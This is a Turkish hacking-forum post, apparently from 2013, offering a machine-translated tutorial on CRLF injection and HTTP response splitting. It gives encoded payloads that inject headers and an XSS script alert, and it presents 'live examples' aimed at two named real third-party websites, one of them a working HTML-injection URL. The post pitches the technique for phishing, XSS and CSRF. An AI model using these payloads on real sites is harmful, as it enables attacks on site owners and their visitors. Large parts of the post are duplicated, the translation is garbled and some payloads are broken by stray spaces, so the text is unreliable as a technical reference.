THT DUYURU

Web & Server Güvenliği Doğru web ve veritabanı sunucusu güvenliği sağlanmadan, bilgisayar korsanları hassas verilerinize erişebilir. Web, Sunucu ve veritabanı güvenliğini nasıl sağlayacağınızı buradan öğrenebilirsiniz.

chat
Seçenekler

TUT] CRLF [TUT] istismar

S4cuRiTy EneMy - ait Kullanıcı Resmi (Avatar)
Forumdan Uzaklaştırıldı
Üyelik tarihi:
04/2012
Nereden:
root@server
Yaş:
24
Mesajlar:
8.779
Konular:
1513
Teşekkür (Etti):
968
Teşekkür (Aldı):
3105
Ticaret:
(0) %
23-10-2013 14:56
#1
TUT] CRLF [TUT] istismar


[ 0x01 ] CRLF:
CRLF-Satır Başı Satır Besleme veya teknoloji açısından - Satır Başı (ASCII 13, \ r) eşittir ve Satır Besleme (ASCII 10, \ n) eşittir. \ R \ n satır sonlandırma not için kullanılır. Bir çizgi bitirmek ve yeni bir, CR ve LF linux işletim sistemlerinde LF sadece (\ n) gereklidir oysa olarak (\ r \ n) gereklidir başlatmak için pencerelerde unutmayın. Bir kullanıcı kullanıcı girişi yoluyla bir uygulamaya CRLF göndermek için yönetir zaman bir CRLF Enjeksiyon oluşur. En sık aşağı $ üzerinden bir URL HTTP parametrelerini değiştirerek GET ve $ POST değişkenleri. Temelde tüm yapıyor olduğunu çünkü CRLF de HTTP Cevap Bölme olarak bilinen bir URL bakın ve sunucuya bir yanıt gönderdiğinizde, sizin tepki biten, bölme bu ve kendi özel yanıt ekleyerek. [ 0x02 ] Olanakları: Biz gerekir İlk düzgün güvenli ve satır başı satır besleme enjekte olmayan bir savunmasız GET değişkeni bulmak ve böylece sunucuya göndermek için yeni bir başlık girin. Bu Saldırı gerçekleştirmek için kullanılabilir: * Phishing * XSS * CSRF (Cross Site Request Forgery) [ 0x03 ] Saldırı: Size, phishing ile tehlikeli bir saldırı içine bu küçük hata onun değil açmak için nasıl çocuklar göstermek istiyorum kadar kötü CHF burada izin, bu yüzden CRLF ile XSS gerçekleştirmek için bazı basit bir örnek vereceğim. sağlar biz geziyor ki:

Kod:
http://www.site.com/index.php?&language=en
Tamam bu nedenle dil değişken ($ dil) İngilizce (tr) bağlam dönmek için ayarlanmış Ama değişken farklı bir dil ayarlandığında gerçekleşir?

Kod:
http://www.site.com/index.php?language=french
Bu $ dil değişken bazı özel değerleri ayarlı değil yani, sitenin bir Fransız versiyonu bize yönlendirmek olacaktır. Bunun yerine ilk url (tr) gibi bir iki mektup değer girme bir dil tam adı (Fransızca) girdi ve böylece kullanıcı $ dil değişkeni kontrol etmek ve bir şey olarak ayarlayın, yani kabul istediği ve . uygulama kabul Şimdi, sunucu ve uygulama $ GET değişkeni $ dilde bir şey kabul biliyorum, biz bir CRLF saldırı kullanabilirsiniz ama biz içeren bir değer girmeniz gerekir: * İçerik Türü * HTTP/1.1 200 OK * Başlık için Sunucu ve yanıt kabul etmek ve yeni bir satır çalıştırmak için uygulama için. İçerik Türü HTML, için ayarlanması gerekir HTTP/1.1 200 OK sadece istek başarılı olduğunu geri yanıttır, ve Başlık sayfada yürütmek istiyoruz. [ * ] XSS SALDIRI:

Kod:
text / html% 0d% 0aHTTP/1.1 200 OK% 0d% 0aContent-Type: text / html% 0d% 0a **********% 0d% 0aContent-Tip http://site.com/index.php?&language=french alert ('XSS') </ script>
* % 0d% 0a LF CR kodlama ve yeni bir başlangıç ​​için geçerli satır sonları budur. Onsuz talebi bölmek olmaz ve idam olmaz. Ama ile isteğiniz şöyle:

Kod:
Content-Type: text / html 
HTTP/1.1 200 OK 
Content-Type: text / html 
script alert ('XSS') </ script>
[ * ] Canlı Örnek:

Kod:
text / html% 0d% 0aHTTP/1.1 200 OK% 0d% 0aContent-Type: text / html% 0d% 0a ********** alert =% 0d% 0aContent-Tip www.palit.biz/palit/index.php?lang ('DES') </ script>


TUT] CRLF [TUT] istismar

[Resim: xkdHqwd.png]

[ 0x01 ] CRLF:
CRLF-Satır Başı Satır Besleme veya teknoloji açısından - Satır Başı (ASCII 13, \ r) eşittir ve Satır Besleme (ASCII 10, \ n) eşittir. \ R \ n satır sonlandırma not için kullanılır. Bir çizgi bitirmek ve yeni bir, CR ve LF linux işletim sistemlerinde LF sadece (\ n) gereklidir oysa olarak (\ r \ n) gereklidir başlatmak için pencerelerde unutmayın. Bir kullanıcı kullanıcı girişi yoluyla bir uygulamaya CRLF göndermek için yönetir zaman bir CRLF Enjeksiyon oluşur. En sık aşağı $ üzerinden bir URL HTTP parametrelerini değiştirerek GET ve $ POST değişkenleri. Temelde tüm yapıyor olduğunu çünkü CRLF de HTTP Cevap Bölme olarak bilinen bir URL bakın ve sunucuya bir yanıt gönderdiğinizde, sizin tepki biten, bölme bu ve kendi özel yanıt ekleyerek. [ 0x02 ] Olanakları: Biz gerekir İlk düzgün güvenli ve satır başı satır besleme enjekte olmayan bir savunmasız GET değişkeni bulmak ve böylece sunucuya göndermek için yeni bir başlık girin. Bu Saldırı gerçekleştirmek için kullanılabilir: * Phishing * XSS * CSRF (Cross Site Request Forgery) [ 0x03 ] Saldırı: Size, phishing ile tehlikeli bir saldırı içine bu küçük hata onun değil açmak için nasıl çocuklar göstermek istiyorum kadar kötü CHF burada izin, bu yüzden CRLF ile XSS gerçekleştirmek için bazı basit bir örnek vereceğim. sağlar biz geziyor ki:


Kod:
http://www.site.com/index.php?&language=en
Tamam bu nedenle dil değişken ($ dil) İngilizce (tr) bağlam dönmek için ayarlanmış Ama değişken farklı bir dil ayarlandığında gerçekleşir?


Kod:
http://www.site.com/index.php?language=french
Bu $ dil değişken bazı özel değerleri ayarlı değil yani, sitenin bir Fransız versiyonu bize yönlendirmek olacaktır. Bunun yerine ilk url (tr) gibi bir iki mektup değer girme bir dil tam adı (Fransızca) girdi ve böylece kullanıcı $ dil değişkeni kontrol etmek ve bir şey olarak ayarlayın, yani kabul istediği ve . uygulama kabul Şimdi, sunucu ve uygulama $ GET değişkeni $ dilde bir şey kabul biliyorum, biz bir CRLF saldırı kullanabilirsiniz ama biz içeren bir değer girmeniz gerekir: * İçerik Türü * HTTP/1.1 200 OK * Başlık için Sunucu ve yanıt kabul etmek ve yeni bir satır çalıştırmak için uygulama için. İçerik Türü HTML, için ayarlanması gerekir HTTP/1.1 200 OK sadece istek başarılı olduğunu geri yanıttır, ve Başlık sayfada yürütmek istiyoruz. [ * ] XSS SALDIRI:

Kod:
text / html% 0d% 0aHTTP/1.1 200 OK% 0d% 0aContent-Type: text / html% 0d% 0a **********% 0d% 0aContent-Tip http://site.com/index.php?&language=french alert ('XSS') </ script>
* % 0d% 0a LF CR kodlama ve yeni bir başlangıç ​​için geçerli satır sonları budur. Onsuz talebi bölmek olmaz ve idam olmaz. Ama ile isteğiniz şöyle:

Kod:
Content-Type: text / html 
HTTP/1.1 200 OK 
Content-Type: text / html
script alert ('XSS') </ script>

[ * ] Canlı Örnek:

Kod:
text / html% 0d% 0aHTTP/1.1 200 OK% 0d% 0aContent-Type: text / html% 0d% 0a ********** alert =% 0d% 0aContent-Tip www.palit.biz/palit/index.php?lang ('DES') </ script>
[ * ] HTML Enjeksiyon Canlı Örnek:


Kod:
http://www.mucsarnok.hu/new_site/index.php?lang=en%0D%0AContent-Type:%20text/html%0D%0AHTTP/1.1%20200%20OK%0D%0AContent-Type:%20text/html%0D%0A%3Ch1%3EDES@CHF%3C/h1%3E
. HTML Enjeksiyon XSS aynıdır, sadece CR LF ile ikinci İçerik Türü kırma sonra Başlık için HTML kodu ekleyin [ 0x04 ] Sonuç: Siz CRLF bu tut zevk sefer, ne olursa olsun, gibi, bu rep bir cevap verin gibi hissediyorum. Sadece sürece yeni bir şey ^ _ ^ NOT öğrenmek gibi benim için önemli değil: kod çubuğunda örneklerde url aralıklı ise, dont bunu da CRLF kullanırken. Ben onlar gibi sona erdi neden bilmiyorum. Saldırı olduğu gibi bu yüzden olsa son Örnek güzel çalıştı.

[ * ] HTML Enjeksiyon Canlı Örnek:

Kod:
http://www.mucsarnok.hu/new_site/index.php?lang=en%0D%0AContent-Type:%20text/html%0D%0AHTTP/1.1%20200%20OK%0D%0AContent-Type:%20text/html%0D%0A%3Ch1%3EDES@CHF%3C/h1%3E
. HTML Enjeksiyon XSS aynıdır, sadece CR LF ile ikinci İçerik Türü kırma sonra Başlık için HTML kodu ekleyin [ 0x04 ] Sonuç: Siz CRLF bu tut zevk sefer, ne olursa olsun, gibi, bu rep bir cevap verin gibi hissediyorum. Sadece sürece yeni bir şey ^ _ ^ NOT öğrenmek gibi benim için önemli değil: kod çubuğunda örneklerde url aralıklı ise, dont bunu da CRLF kullanırken. Ben onlar gibi sona erdi neden bilmiyorum. Saldırı olduğu gibi bu yüzden olsa son Örnek güzel çalıştı.


Bookmarks


« Önceki Konu | Sonraki Konu »
Seçenekler